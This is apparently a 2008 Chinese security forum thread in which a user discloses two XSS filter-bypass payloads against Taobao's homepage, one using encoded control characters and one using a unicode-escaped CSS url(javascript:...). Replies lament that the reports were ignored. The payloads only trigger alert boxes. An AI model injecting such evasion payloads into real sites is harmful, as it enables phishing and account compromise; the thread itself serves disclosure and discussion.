bzcyer 发表于 2008-10-21 13:38:59

淘宝首页XSS(新的2处)

写到自己博客上了:http://www.bzcyer.com/view.asp?id=72

这里也贴一份,虽然没多少实际的用途,最多就做下钓鱼,
1、可以插入回车、包括段末结尾符和换行符的两种、即char(10)和char(13)、tab空格

<img src="&#25;jav&#13;as&#10;cript:al&#13;ert('test');">
http://www.bzcyer.com/upload/taobao01.jpg

2.转码

<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029\0029">

原始的代码是: <DIV STYLE="background-image:url(javascript:alert('XSS'))">

http://www.bzcyer.com/upload/taobao02.jpg

刚那没转码的:<DIV STYLE="background-image:url(javascript:alert('XSS'))">,试下一样出问题,看来这里转不转码都会出问题。

bzcyer 发表于 2008-10-21 13:40:53

在个人账户后台那,也有一些,taobao也没人处理,哎
现在是注册N多帐号,基本上测一次,报废1个帐号

bzcyer 发表于 2008-10-27 14:54:53

淘宝客服的回复,哎...

sihanjishu 发表于 2008-11-8 00:20:37

我在他们公司内网上也发过,可惜没有人理会。
还有很多。即使过滤过的一些漏洞,稍微变形一下,也可以测试出来。
无语了。

他们对xss不重视。
看来只有做出一个什么比较有危害的脚本,才可以“打动”他们。

不知道有没有注入漏洞。注入漏洞更危险。

bzcyer 发表于 2008-11-8 18:53:30

这个只是小问题,都没人处理,那我手上的一些严重的权限bug,都不能公布在网上,想告诉淘宝,得,也没人理。
:L
那就继续放着好了。

F.Lampard 发表于 2008-12-23 16:01:26

淘宝照这样看来不安全哦

lvxdoo 发表于 2008-12-24 17:44:22

有机会一定加强学习

jessies 发表于 2009-4-30 11:21:15

一年前的帖子,淘宝应该现在重视了吧~~

moyiyun 发表于 2011-11-16 14:54:37

幸亏我们不是黑客
页: [1]
查看完整版本: 淘宝首页XSS(新的2处)